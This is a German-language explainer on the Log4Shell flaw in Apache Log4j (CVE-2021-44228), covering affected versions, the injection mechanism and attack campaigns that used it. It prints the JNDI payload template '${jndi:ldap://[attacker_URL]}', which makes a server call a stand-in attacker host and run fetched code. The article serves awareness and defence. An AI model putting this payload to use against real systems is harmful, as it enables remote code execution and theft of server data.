Log4Shell-Sicherheitslücke

Am 10. Dezember 2021 wurde ein Exploit für eine kritische Sicherheitslücke in der Java-basierten Protokollierungsplattform Apache Log4j veröffentlicht. Die Schwachstelle wird als CVE-2021-44228 oder Log4Shell verfolgt und betrifft Log4j-Versionen von Log4j 2.0-beta9 und bis 2.14.1. Bedrohungsakteure können den Exploit nutzen, um einen nicht authentifizierten Fernzugriff einzurichten, Code auszuführen, Malware-Bedrohungen zu übermitteln oder Informationen zu sammeln. Der Schwachstelle wird ein kritischer Status zugewiesen, da Log4j häufig von Unternehmensanwendungen und Cloud-Diensten verwendet wird.

Log4Shell Technische Details

Der Exploit beginnt damit, dass der Angreifer den User-Agent des Webbrowsers ändert. Dann besuchen sie eine Website oder suchen nach einer bestimmten Zeichenfolge auf Websites mit dem Format:

${jndi:ldap://[attacker_URL]}

Als Ergebnis wird die Zeichenfolge den Zugriffsprotokollen des Webservers hinzugefügt. Die Angreifer warten dann, bis die Log4j-Anwendung diese Protokolle analysiert und die angehängte Zeichenfolge erreicht. In diesem Fall wird der Fehler ausgelöst, wodurch der Server einen Rückruf an die im JNDI-String enthaltene URL durchführt. Diese URL wird missbraucht, um Base64-codierte Befehle oder Java-Klassen zu verarbeiten. Anschließend werden diese auf dem kompromittierten Gerät ausgeführt. 

Apache veröffentlichte schnell eine neue Version – Log4j 2.15.0, um den Exploit zu beheben, aber eine beträchtliche Anzahl anfälliger Systeme könnte für lange Zeit ungepatcht bleiben. Gleichzeitig wurden Bedrohungsakteure schnell auf die Zero-Day-Schwachstelle von Log4Shell aufmerksam und begannen, nach geeigneten Servern zu suchen, die sie ausnutzen könnten. Die infosec-Community hat zahlreiche Angriffskampagnen verfolgt, bei denen Log4Shell verwendet wurde, um eine Vielzahl von Malware-Bedrohungen zu verbreiten.

Log4Shell wird bei Cryptominer-, Botnet-, Backdoor- und Datensammelangriffen verwendet

Einer der ersten Bedrohungsakteure, die Log4Shell in ihren Betrieb implementierten, waren die Cyberkriminellen hinter dem Krypto-Mining-Botnet Kinsing. Die Hacker verwendeten Log4Shell, um Base64-codierte Nutzlasten bereitzustellen und Shell-Skripte auszuführen. Die Rolle dieser Skripte besteht darin, das Zielsystem von konkurrierenden Krypto-Mining-Bedrohungen zu befreien, bevor ihre eigene Kinsing-Malware ausgeführt wird.

Netlab 360 entdeckte Bedrohungsakteure, die die Schwachstelle nutzten, um Versionen der Botnets Mirai und Muhstik auf den angegriffenen Geräten zu installieren. Diese Malware-Bedrohungen dienen dazu, infizierte Systeme in ein Netzwerk von IoT-Geräten und -Servern einzufügen, die die Angreifer dann anweisen können, DDoS-Angriffe (Distributed Denial-of-Service) zu starten oder anschließend Krypto-Miner einzusetzen.

Nach Angaben des Microsoft Threat Intelligence Center wurde der Log4j-Exploit auch Ziel von Angriffskampagnen, bei denen Cobalt-Strike-Beacons abgeworfen wurden. Cobalt Strike ist ein legitimes Softwaretool, das für Penetrationstests gegen die Sicherheitssysteme eines Unternehmens verwendet wird. Seine Backdoor-Fähigkeiten haben es jedoch zu einem gemeinsamen Bestandteil des Arsenals zahlreicher Bedrohungsgruppen gemacht. Anschließend wird der illegale Backdoor-Zugriff auf das Netzwerk des Opfers verwendet, um Nutzlasten der nächsten Stufe wie Ransomware, Info-Stealer und andere Malware-Bedrohungen bereitzustellen.

Log4Shell kann ausgenutzt werden, um Umgebungsvariablen zu erfassen, die Serverdaten enthalten. Auf diese Weise können Angreifer Zugriff auf den Namen des Hosts, den Betriebssystemnamen, die Versionsnummer des Betriebssystems, den Benutzernamen, unter dem der Log4j-Dienst ausgeführt wird, und mehr erhalten.